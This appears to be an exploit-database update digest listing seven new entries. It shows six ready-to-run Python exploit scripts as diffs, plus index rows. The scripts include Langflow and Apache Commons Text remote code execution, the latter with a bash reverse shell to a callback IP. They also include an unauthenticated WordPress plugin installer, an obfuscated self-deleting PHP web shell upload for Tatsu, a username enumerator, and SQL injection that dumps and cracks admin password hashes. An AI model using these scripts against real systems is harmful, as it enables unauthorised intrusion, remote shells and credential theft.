DB: 2025-04-19

8 changes to exploits/shellcodes/ghdb

Langflow 1.3.0 -  Remote Code Execution (RCE)

Apache Commons Text  1.10.0 - Remote Code Execution

Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation

UJCMS 9.6.3 - User Enumeration via IDOR

Inventio Lite 4 - SQL Injection

KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection

Tatsu 3.3.11 - Unauthenticated RCE

exploits/multiple/remote/52262.txt

@@ -0,0 +1,107 @@
+# Exploit Title: Langflow 1.3.0 -  Remote Code Execution (RCE)
+# Date: 2025-04-17
+# Exploit Author: VeryLazyTech
+# Vendor Homepage: http://www.langflow.org/
+# Software Link: https://github.com/langflow-ai/langflow
+# Version: Langflow < 1.3.0
+# Tested on: Windows Server 2019
+# CVE: CVE-2025-3248
+# CVE-2025-3248 - Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code
+# FOFA "Langflow"
+# Medium: https://medium.com/@verylazytech
+# GitHub: https://github.com/verylazytech
+# Shop: https://shop.verylazytech.com
+# Website: https://www.verylazytech.com
+
+import argparse
+import requests
+import json
+from urllib.parse import urljoin
+import random
+from colorama import init, Fore, Style
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings()
+
+# Initialize colorama
+init(autoreset=True)
+
+# Constants
+ENDC = "\033[0m"
+ENCODING = "UTF-8"
+COLORS = [Fore.GREEN, Fore.CYAN, Fore.BLUE]
+
+def banner():
+    random_color = random.choice(COLORS)
+    return f"""{Style.BRIGHT}{random_color}
+  ______     _______   ____   ___ ____  ____    _________  _  _    ___
+ / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ /___ \| || |  ( _ )
+| |    \ \ / /|  _|     __) | | | |__) |___ \    |_ \ __) | || |_ / _ \
+| |___  \ V / | |___   / __/| |_| / __/ ___) |  ___) / __/|__   _| (_) |
+ \____|  \_/  |_____| |_____|\___/_____|____/  |____/_____|  |_|  \___/
+
+
+__     __                _                      _____         _
+\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__
+ \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \
+  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
+   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
+                 |___/                  |___/
+
+                    {Style.BRIGHT}{Fore.WHITE}@VeryLazyTech - Medium {Style.RESET_ALL}\n
+{Style.RESET_ALL}
+"""
+
+print(banner())
+
+class LangflowScanner:
+    def __init__(self, url, timeout=10):
+        self.url = url.rstrip('/')
+        self.timeout = timeout
+        self.session = requests.Session()
+        self.session.verify = False
+        self.session.headers.update({
+            'User-Agent': 'Mozilla/5.0',
+            'Content-Type': 'application/json',
+            'Accept': 'application/json',
+        })
+
+    def exploit(self, command):
+        endpoint = urljoin(self.url, '/api/v1/validate/code')
+        payload = {
+            "code": f"""
+def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass
+"""
+        }
+
+        try:
+            print(f"{Fore.YELLOW}[*] Sending payload to {endpoint}")
+            response = self.session.post(endpoint, json=payload, timeout=self.timeout)
+            print(f"{Fore.YELLOW}[*] Status Code: {response.status_code}")
+            print(f"{Fore.YELLOW}[*] Raw Response: {response.text}")
+
+            if response.status_code == 200:
+                try:
+                    data = response.json()
+                    error_msg = data.get("function", {}).get("errors", [""])[0]
+                    if isinstance(error_msg, str) and error_msg.startswith("b'"):
+                        output = error_msg[2:-1].encode().decode('unicode_escape').strip()
+                        return output
+                except Exception as e:
+                    return f"[!] Failed to parse response: {str(e)}"
+            return f"[!] Exploit failed with status {response.status_code}"
+        except requests.RequestException as e:
+            return f"[!] Request failed: {str(e)}"
+
+def main():
+    parser = argparse.ArgumentParser(description="Langflow CVE-2025-3248 Exploit")
+    parser.add_argument("url", help="Target base URL (e.g., http://host:port)")
+    parser.add_argument("cmd", help="Command to execute (e.g., whoami)")
+    args = parser.parse_args()
+
+    scanner = LangflowScanner(args.url)
+    result = scanner.exploit(args.cmd)
+    print(f"{Fore.GREEN}[+] Command Output:\n{result}")
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52259.py

@@ -0,0 +1,65 @@
+# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
+# Date: 16 December, 2024
+# Exploit Author: Jun Takemura
+# Author's GitHub: https://github.com/JunTakemura
+# Author's Blog: juntakemura.dev
+# Vendor Homepage: https://themehunk.com
+# Software Link: https://wordpress.org/plugins/hunk-companion/
+# Version: Tested on Hunk Companion 1.8.8
+# CVE: CVE-2024-11972
+# Vulnerability Description:
+#     Exploits a flaw in the Hunk Companion plugin's permission_callback for the
+#     /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
+#     to install and activate arbitrary plugins from the WordPress.org repository.
+# Tested on: Ubuntu
+# Original vulnerability discovered by: Daniel Rodriguez
+#
+# Usage:
+#     1. Update `target_url` below with the target WordPress site's URL.
+#     2. Update `plugin_name` with the slug of the plugin you want to install.
+#     3. Run: python3 exploit.py
+#
+import requests
+from urllib.parse import urljoin
+
+# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
+target_url = "URL"
+
+# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
+plugin_name = "NAME"
+
+endpoint = "/wp-json/hc/v1/themehunk-import"
+url = urljoin(target_url, endpoint)
+
+payload = {
+    "params": {
+        "plugin": {
+            plugin_name: "Plugin Label"
+        },
+        "allPlugins": [
+            {
+                plugin_name: f"{plugin_name}/{plugin_name}.php"
+            }
+        ],
+        "themeSlug": "theme",
+        "proThemePlugin": "plugin",
+        "templateType": "free",
+        "tmplFreePro": "theme",
+        "wpUrl": target_url
+    }
+}
+
+headers = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
+    "Content-Type": "application/json"
+}
+
+try:
+    response = requests.post(url, json=payload, headers=headers, timeout=10)
+    response.raise_for_status()  # Raises an HTTPError if the response is not 2xx
+
+    print(f"[+] Exploit sent successfully.")
+    print(f"Response Status Code: {response.status_code}")
+    print(f"Response Body: {response.text}")
+except requests.exceptions.RequestException as e:
+    print(f"[-] Request failed: {e}")

exploits/multiple/webapps/52261.py

@@ -0,0 +1,58 @@
+# Exploit Title: Apache Commons Text  1.10.0 - Remote Code Execution
+(Text4Shell - POST-based)
+# Date: 2025-04-17
+# Exploit Author: Arjun Chaudhary
+# Vendor Homepage: https://commons.apache.org/proper/commons-text/
+# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
+# Version: Apache Commons Text < 1.10.0
+# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
+# CVE: CVE-2022-42889
+# Type: Remote Code Execution (RCE)
+# Method: POST request, script interpolator
+# Notes: This exploit demonstrates an RCE vector via POST data, differing
+from common GET-based payloads.
+
+#!/usr/bin/env python3
+
+import urllib.parse
+import http.client
+import sys
+
+def usage():
+    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
+    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
+    sys.exit(1)
+
+if len(sys.argv) != 4:
+    usage()
+
+target_ip = sys.argv[1]
+callback_ip = sys.argv[2]
+callback_port = sys.argv[3]
+
+raw_payload = (
+    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
+    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
+)
+
+
+encoded_payload = urllib.parse.quote(raw_payload)
+
+
+path = f"/?data={encoded_payload}" # modify the parameter according to your target
+
+print(f"[!] Remember to modify the parameter according to your target")
+print(f"[+] Target: http://{target_ip}{path}")
+print(f"[+] Payload (decoded): {raw_payload}")
+
+
+conn = http.client.HTTPConnection(target_ip, 80)
+conn.request("POST", path, body="", headers={
+    "Host": target_ip,
+    "Content-Type": "application/json",
+    "Content-Length": "0"
+})
+response = conn.getresponse()
+print(f"[+] Response Status: {response.status}")
+print(response.read().decode())
+conn.close()

exploits/multiple/webapps/52264.py

@@ -0,0 +1,61 @@
+# Exploit Title: UJCMS 9.6.3 User Enumeration via IDOR
+# Exploit Author: Cyd Tseng
+# Date: 11 Dec 2024
+# Category: Web application
+# Vendor Homepage: https://dromara.org/
+# Software Link: https://github.com/dromara/ujcms
+# Version: UJCMS 9.6.3
+# Tested on: Linux
+# CVE: CVE-2024-12483
+# Advisory: https://github.com/cydtseng/Vulnerability-Research/blob/main/ujcms/IDOR-UsernameEnumeration.md
+
+"""
+
+An Insecure Direct Object Reference (IDOR) vulnerability was discovered in UJCMS version 9.6.3 that allows unauthenticated enumeration of usernames through the manipulation of the user id parameter in the /users/id endpoint. While the user IDs are generally large numbers (e.g., 69278363520885761), with the exception of the admin and anonymous account, unauthenticated attackers can still systematically discover usernames of existing accounts.
+
+"""
+
+
+import requests
+from bs4 import BeautifulSoup
+import time
+import re
+
+BASE_URL = 'http://localhost:8080/users/{}' # Modify as necessary!
+HEADERS = {
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Connection': 'keep-alive'
+}
+
+def fetch_user_data(user_id):
+    url = BASE_URL.format(user_id)
+    try:
+        response = requests.get(url, headers=HEADERS)
+        if response.status_code == 200:
+            soup = BeautifulSoup(response.content, 'html.parser')
+            title = soup.title.string.strip()
+            if title.lower() != '404':
+                username = re.sub(r' - UJCMS演示站$', '', title)
+                return user_id, username
+        return None
+    except requests.RequestException as e:
+        print(f"Error fetching data for user ID {user_id}: {e}")
+        return None
+
+def user_id_generator(start, end):
+    for user_id in range(start, end + 1):
+        yield user_id
+
+def enumerate_users(start_id, end_id):
+    for user_id in user_id_generator(start_id, end_id):
+        user_data = fetch_user_data(user_id)
+        if user_data:
+            print(f"Valid user found: ID {user_data[0]} with username '{user_data[1]}'")
+        time.sleep(0.1)
+
+if __name__ == '__main__':
+    start_id = int(input("Enter the starting user ID: "))
+    end_id = int(input("Enter the ending user ID: "))
+    print(f"Starting enumeration from ID {start_id} to {end_id}...")
+    enumerate_users(start_id, end_id)

exploits/php/webapps/52260.py

@@ -0,0 +1,194 @@
+# Exploit Title:Tatsu 3.3.11 - Unauthenticated RCE
+# Date: 2025-04-16
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# MiRROR-H: https://mirror-h.org/search/hacker/49626/
+# Product: Tatsu wordpress plugin <= 3.3.11
+# CVE: CVE-2021-25094
+# URL: https://tatsubuilder.com/
+
+
+import sys
+import requests
+import argparse
+import urllib3
+import threading
+import time
+import base64
+import queue
+import io
+import os
+import zipfile
+import string
+import random
+from datetime import datetime
+
+urllib3.disable_warnings()
+
+class HTTPCaller():
+
+ def __init__(self, url, headers, proxies, cmd):
+  self.url = url
+  self.headers = headers
+  self.proxies = proxies
+  self.cmd = cmd
+  self.encodedCmd = base64.b64encode(cmd.encode("utf8"))
+  self.zipname = None
+  self.shellFilename = None
+
+  if self.url[-1] == '/':
+   self.url = self.url[:-1]
+
+  if proxies:
+   self.proxies = {"http" : proxies, "https" : proxies}
+  else:
+   self.proxies = {}
+
+ def generateZip(self, compressionLevel, technique, customShell, keep):
+  buffer = io.BytesIO()
+  with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED, False,
+compressionLevel) as zipFile:
+
+   if technique == "custom" and customShell and os.path.isfile(customShell):
+    with open(customShell) as f:
+     shell = f.readlines()
+    shell = "\n".join(shell)
+    self.shellFilename = os.path.basename(customShell)
+    if self.shellFilename[0] != ".":
+     self.shellFilename = "." + self.shellFilename
+
+    zipFile.writestr(self.shellFilename, shell)
+
+   elif technique == "php":
+    # a lazy obfuscated shell, basic bypass Wordfence
+    # i would change base64 encoding for something better
+    shell = "<?php "
+    shell += "$f = \"lmeyst\";"
+    shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
+    shell += "@$words = array(base64_decode($_POST['text']));"
+    shell += "$j=\"array\".\"_\".\"filter\";"
+    shell += "@$filtered_words = $j($words, $a);"
+    if not keep:
+     shell += "@unlink(__FILE__);"
+    self.shellFilename = "." +
+(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".php"
+    zipFile.writestr(self.shellFilename, shell)
+
+
+   elif technique.startswith("htaccess"):
+
+    # requires AllowOverride All in the apache config file
+    shell = "AddType application/x-httpd-php .png\n"
+    zipFile.writestr(".htaccess", shell)
+
+    shell = "<?php "
+    shell += "$f = \"lmeyst\";"
+    shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
+    shell += "@$words = array(base64_decode($_POST['text']));"
+    shell += "$j=\"array\".\"_\".\"filter\";"
+    shell += "@$filtered_words = $j($words, $a);"
+    if not keep:
+     shell += "@unlink('.'+'h'+'t'+'a'+'cc'+'e'+'ss');"
+     shell += "@unlink(__FILE__);"
+    self.shellFilename = "." +
+(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".png"
+    zipFile.writestr(self.shellFilename, shell)
+
+   else:
+    print("Error: unknow shell technique %s" % technique)
+    sys.exit(1)
+
+   self.zipname = ''.join(random.choice(string.ascii_lowercase) for i in
+range(3))
+
+  self.zipFile = buffer
+
+ def getShellUrl(self):
+  return "%s/wp-content/uploads/typehub/custom/%s/%s" % (self.url,
+self.zipname, self.shellFilename)
+
+ def executeCmd(self):
+  return requests.post(url = self.getShellUrl(), data = {"text":
+self.encodedCmd}, headers = self.headers, proxies = self.proxies,
+verify=False)
+
+ def upload(self):
+  url = "%s/wp-admin/admin-ajax.php" % self.url
+  files = {"file": ("%s.zip" % self.zipname, self.zipFile.getvalue())}
+  return requests.post(url = url, data = {"action": "add_custom_font"},
+files = files, headers = self.headers, proxies = self.proxies, verify=False)
+
+def main():
+ description = "|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress
+plugin <= 3.3.8\n"
+ description += "|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)"
+
+ print(description)
+ print("")
+
+ parser = argparse.ArgumentParser()
+ parser.add_argument("url", help="Wordpress vulnerable URL (example:
+https://mywordpress.com/)")
+ parser.add_argument("cmd", help="OS command to execute")
+ parser.add_argument('--technique', help="Shell technique: php | htaccess |
+custom", default="php")
+ parser.add_argument('--customShell', help="Provide a custom PHP shell file
+that will take a base64 cmd as $_POST['text'] input")
+ parser.add_argument('--keep', help="Do not auto-destruct the uploaded PHP
+shell", default=False, type=bool)
+ parser.add_argument('--proxy', help="Specify and use an HTTP proxy
+(example: http://localhost:8080)")
+ parser.add_argument('--compressionLevel', help="Compression level of the
+zip file (0 to 9, default 9)", default=9, type=int)
+
+ args = parser.parse_args()
+ # Use web browser-like header
+ headers = {
+  "X-Requested-With": "XMLHttpRequest",
+  "Origin": args.url,
+  "Referer": args.url,
+  "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/90.0.4430.212 Safari/537.36",
+  "Accept": "*/*",
+  "Accept-Language": "en-US,en;q=0.9"
+ }
+
+ caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)
+ print("[+] Generating a zip with shell technique '%s'" % args.technique)
+ caller.generateZip(args.compressionLevel, args.technique,
+args.customShell, args.keep)
+
+ print("[+] Uploading zip archive to
+%s/wp-admin/admin-ajax.php?action=add_custom_font" % (args.url))
+ r = caller.upload()
+ if (r.status_code != 200 or not r.text.startswith('{"status":"success"')):
+  print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
+(r.status_code, r.text))
+  print("[!] Exploit failed!")
+  sys.exit(1)
+
+ print("[+] Upload OK")
+
+ print("[+] Trigger shell at %s" % caller.getShellUrl())
+ r = caller.executeCmd()
+ if (r.status_code != 200):
+  print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
+(r.status_code, r.text))
+  print("[!] Exploit failed!")
+  sys.exit(1)
+ print("[+] Exploit success!")
+ print(r.text)
+
+ if args.keep:
+  print("[+] Call it with:")
+  print('curl -X POST -d"text=$(echo "{0}" | base64 -w0)"
+{1}'.format(args.cmd, caller.getShellUrl()))
+ else:
+  print("[+] Shell file has been auto-deleted but parent directory will
+remain on the webserver")
+
+ print("[+] Job done")
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/52263.py

@@ -0,0 +1,124 @@
+# Exploit Title: Inventio Lite 4 - SQL Injection
+Error Based SQLi in "username" parameter on "/?action=processlogin."
+# Date: 08/21/2024
+# Exploit Author: pointedsec
+# Vendor Homepage: http://evilnapsis.com
+# Software Link: https://github.com/evilnapsis/inventio-lite
+# Version: < 4
+# Tested on: Linux, Windows
+# CVE : CVE-2024-44541
+# This scripts exploit this vulnerability, extracting the hashes from database and tries to decrypt it.
+# The passwords are hashed like this: $pass = sha1(md5($_POST['password']));
+
+import requests
+import signal
+from pwn import *
+
+BASE_URL = "http://192.168.1.51/inventio-lite/"
+PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"
+LOGIN_ACTION = BASE_URL + "?action=processlogin"
+
+# Handling Ctrl + C
+def def_handler(x,y):
+    log.failure("Quitting...")
+    exit(1)
+
+signal.signal(signal.SIGINT, def_handler)
+
+def is_vulnerable():
+    log.info("Checking if target is vulnerable")
+    payload = {
+        "username": "\") \"",
+        "password": "\") \""
+    }
+    r = requests.post(LOGIN_ACTION, data=payload)
+    if (r.status_code != 200 or "Uncaught mysqli_sql_exception" in r.text):
+        return True
+    else:
+        return False
+
+def get_administrator_hash(username):
+    prog_hash = log.progress("Extracting Admin Password Hash")
+    replace_payload = "\") or username LIKE '<USER>' or email LIKE '<USER>' and password LIKE '<STR>%' and is_admin=1 LIMIT 1-- -".replace("<USER>", username)
+    characters = "abcdefghijklmnopqrstuvwxyz0123456789"  # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases
+    admin_hash = ""
+
+    while True:
+        found_char = False
+        for char in characters:
+            payload = {
+                "username": replace_payload.replace("<STR>", admin_hash + char),
+                "password": "blablablbalbablalba123@"
+            }
+            try:
+                r = requests.post(LOGIN_ACTION, data=payload)
+                r.raise_for_status()
+            except requests.RequestException as e:
+                log.error(f"Request failed: {e}")
+                continue
+
+            if "<script>window.location='index.php?view=home';</script>" in r.text:
+                admin_hash += char
+                prog_hash.status("-> %s" % admin_hash)
+                found_char = True
+                break
+
+        if not found_char:
+            break
+
+    prog_hash.status("Final Admin Hash: %s" % admin_hash)
+    return admin_hash
+
+def get_administrator_username():
+    prog_username = log.progress("Extracting Username")
+    replace_payload = "\") or username like '<STR>%' or email like '<STR>%' and is_admin=1 LIMIT 1-- -"
+    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@."
+    username = ""
+
+    while True:
+        found_char = False
+        for char in characters:
+            payload = {
+                "username": replace_payload.replace("<STR>", username + char),
+                "password": "blablablablbalbla123@"
+            }
+            r = requests.post(LOGIN_ACTION, data=payload)
+
+            if "<script>window.location='index.php?view=home';</script>" in r.text:
+                username += char
+                prog_username.status("-> %s" % username)
+                found_char = True
+                break
+
+        if not found_char:
+            break
+
+    return username
+
+def decrypt_password(admin_hash):
+    # Encryption is SHA1(MD5(PWD))
+    with open(PWD_DIC_PATH) as password_file:
+        for password in password_file:
+            password = password.strip()
+
+            md5_hash = hashlib.md5(password.encode()).hexdigest()
+            sha1_hash = hashlib.sha1(md5_hash.encode()).hexdigest()
+
+            if sha1_hash == admin_hash:
+                return password
+
+        log.error("Password not found in the dictionary.")
+        return None
+
+if __name__ == "__main__":
+    # Check if target is vulnerable
+    if not is_vulnerable():
+        log.failure("Target not Vulnerable...")
+        exit(1)
+    log.success("Target Vulnerable!")
+    log.info("Dumping Administrator username...")
+    admin_username = get_administrator_username()
+    admin_hash = get_administrator_hash(admin_username)
+    pwd = decrypt_password(admin_hash)
+    log.success(f"Password Decrypted! -> {admin_username}:{pwd}")
+    log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations")

exploits/php/webapps/52265.py

@@ -0,0 +1,154 @@
+# Exploit Title: KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection
+SQL Injection
+# Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/
+# Date: 11/12/2024
+# Exploit Author: Samet "samogod" Gözet
+# Vendor Homepage: wordpress.org
+# Software Link:
+https://wordpress.org/plugins/kivicare-clinic-management-system/
+# Version: < 3.6.5
+# Tested on: Ubuntu 22.04
+# CVE : CVE-2024-11728
+#!/usr/bin/env python3
+"""
+CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection PoC
+Author: samogod.samet.g
+
+Description:
+    Proof of Concept for Unauthenticated SQL Injection vulnerability
+in KiviCare WordPress Plugin <= 3.6.4.
+    The vulnerability exists in the tax_calculated_data AJAX action
+where the visit_type[service_id]
+    parameter is insufficiently escaped, allowing SQL injection attacks.
+
+Usage:
+    python3 CVE-2024-11728.py -u <target_url> [-t <timeout>] [-v]
+"""
+
+import argparse
+import requests
+import sys
+import time
+from urllib3.exceptions import InsecureRequestWarning
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+class KiviCareExploit:
+    def __init__(self, url, timeout=10, verbose=False):
+        self.url = url.rstrip('/')
+        self.timeout = timeout
+        self.verbose = verbose
+        self.target = f"{self.url}/wp-admin/admin-ajax.php"
+        self.headers = {
+            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Accept': '*/*'
+        }
+
+    def log(self, message, level="info"):
+        """Custom logging function"""
+        colors = {
+            "info": "\033[94m[*]",
+            "success": "\033[92m[+]",
+            "error": "\033[91m[-]",
+            "warning": "\033[93m[!]"
+        }
+        print(f"{colors.get(level, '[*]')} {message}\033[0m")
+
+    def verify_vulnerability(self):
+        """Verify if the target is vulnerable using a time-based SQL
+injection"""
+        self.log("Testing vulnerability with time-based SQL injection...")
+
+        data = {
+            'action': 'ajax_post',
+            'route_name': 'tax_calculated_data',
+            'clinic_id[id]': '1',
+            'doctor_id[id]': '1',
+            'visit_type[0][service_id]': "123) AND (SELECT * FROM
+(SELECT(SLEEP(5)))alias) AND (1=1",
+            '_ajax_nonce': '5d77fc94cf' # You need to update this nonce value
+        }
+
+        try:
+            normal_data = {
+                'action': 'ajax_post',
+                'route_name': 'tax_calculated_data',
+                'clinic_id[id]': '1',
+                'doctor_id[id]': '1',
+                'visit_type[0][service_id]': "1",
+                '_ajax_nonce': '5d77fc94cf' # You need to update this
+nonce value
+            }
+
+            start_time = time.time()
+            normal_response = requests.post(
+                self.target,
+                data=normal_data,
+                headers=self.headers,
+                verify=False,
+                timeout=self.timeout
+            )
+            normal_time = time.time() - start_time
+
+            if self.verbose:
+                self.log(f"Normal request time: {normal_time:.2f}
+seconds", "info")
+                self.log(f"Normal response: {normal_response.text}", "info")
+
+            start_time = time.time()
+            try:
+                response = requests.post(
+                    self.target,
+                    data=data,
+                    headers=self.headers,
+                    verify=False,
+                    timeout=self.timeout
+                )
+                elapsed_time = time.time() - start_time
+
+                if self.verbose:
+                    self.log(f"Injection request time:
+{elapsed_time:.2f} seconds", "info")
+                    self.log(f"Request data: {data}", "info")
+
+                if elapsed_time >= 4.5:
+                    self.log("Target appears to be vulnerable!", "success")
+                    return True
+                else:
+                    self.log("Target does not appear to be
+vulnerable.", "warning")
+                    return False
+
+            except requests.exceptions.Timeout:
+                self.log("Request timed out - target is vulnerable!", "success")
+                return True
+
+        except requests.exceptions.RequestException as e:
+            self.log(f"Error during vulnerability check: {str(e)}", "error")
+            return False
+
+def main():
+    parser = argparse.ArgumentParser(description='KiviCare WordPress
+Plugin Unauthenticated SQL Injection PoC (CVE-2024-11728)')
+    parser.add_argument('-u', '--url', required=True, help='Target URL
+(e.g., http://example.com)')
+    parser.add_argument('-t', '--timeout', type=int, default=10,
+help='Request timeout in seconds')
+    parser.add_argument('-v', '--verbose', action='store_true',
+help='Enable verbose output')
+    args = parser.parse_args()
+
+    print("""
+    CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection
+    Author: samogod.samet.g
+    """)
+
+    exploit = KiviCareExploit(args.url, args.timeout, args.verbose)
+
+    exploit.verify_vulnerability()
+
+if __name__ == '__main__':
+    main()

files_exploits.csv

@@ -11119,6 +11119,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20491,exploits/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",remote,multiple,,2000-12-08,2012-08-13,1,CVE-2001-0034;OSVDB-4888,,,,,https://www.securityfocus.com/bid/2090/info
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,,2018-12-24,2018-12-24,0,CVE-2018-1002105,,,,,https://github.com/evict/poc_CVE-2018-1002105/blob/f704f2e593fbb686b4a5799dc13e8bfcec13f3c3/poc.py
 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,,2018-12-24,2018-12-24,0,CVE-2018-1002105,,,,,https://github.com/evict/poc_CVE-2018-1002105/blob/ed5da79aadad0049d11f89fcb9ed65f987a331a1/unauth_poc.py
+52262,exploits/multiple/remote/52262.txt,"Langflow 1.3.0 -  Remote Code Execution (RCE)",2025-04-18,VeryLazyTech,remote,multiple,,2025-04-18,2025-04-18,0,CVE-2025-3248,,,,,
 42885,exploits/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",remote,multiple,,2017-09-28,2017-09-28,0,CVE-2017-6020,,,,,
 39318,exploits/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",remote,multiple,,2014-09-16,2016-01-25,1,,,,,,https://www.securityfocus.com/bid/69849/info
 36836,exploits/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution",2015-04-27,"Jay Turla",remote,multiple,,2015-04-27,2016-10-10,1,OSVDB-121681,,,,,
@@ -11726,6 +11727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,,
 15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
 12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,,
+52261,exploits/multiple/webapps/52261.py,"Apache Commons Text  1.10.0 - Remote Code Execution",2025-04-18,"Arjun Chaudhary",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2022-42889,,,,,
 46406,exploits/multiple/webapps/46406.txt,"Apache CouchDB 2.3.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,,2019-02-18,2019-02-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comapache-couchdb-2.3.0.tar.gz,
 46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,,2019-03-25,2019-03-25,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comapache-couchdb-2.3.1.tar.gz,
 46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,,2019-03-25,2019-03-25,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comapache-couchdb-2.3.1.tar.gz,
@@ -12006,6 +12008,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41927,exploits/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",webapps,multiple,,2017-04-25,2017-04-25,1,CVE-2017-5799;CVE-2017-5798,"File Inclusion (LFI/RFI)",,,,https://blogs.securiteam.com/index.php/archives/3087
 10012,exploits/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,webapps,multiple,,2009-09-24,2016-10-24,1,OSVDB-64918;CVE-2009-5067,,,,,
 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,,2021-04-15,2021-04-15,0,CVE-2021-30637,,,,,
+52259,exploits/multiple/webapps/52259.py,"Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation",2025-04-18,"Jun Takemura",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2024-11972,,,,,
 50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",2021-11-02,LiquidWorm,webapps,multiple,,2021-11-02,2021-11-02,0,,,,,,
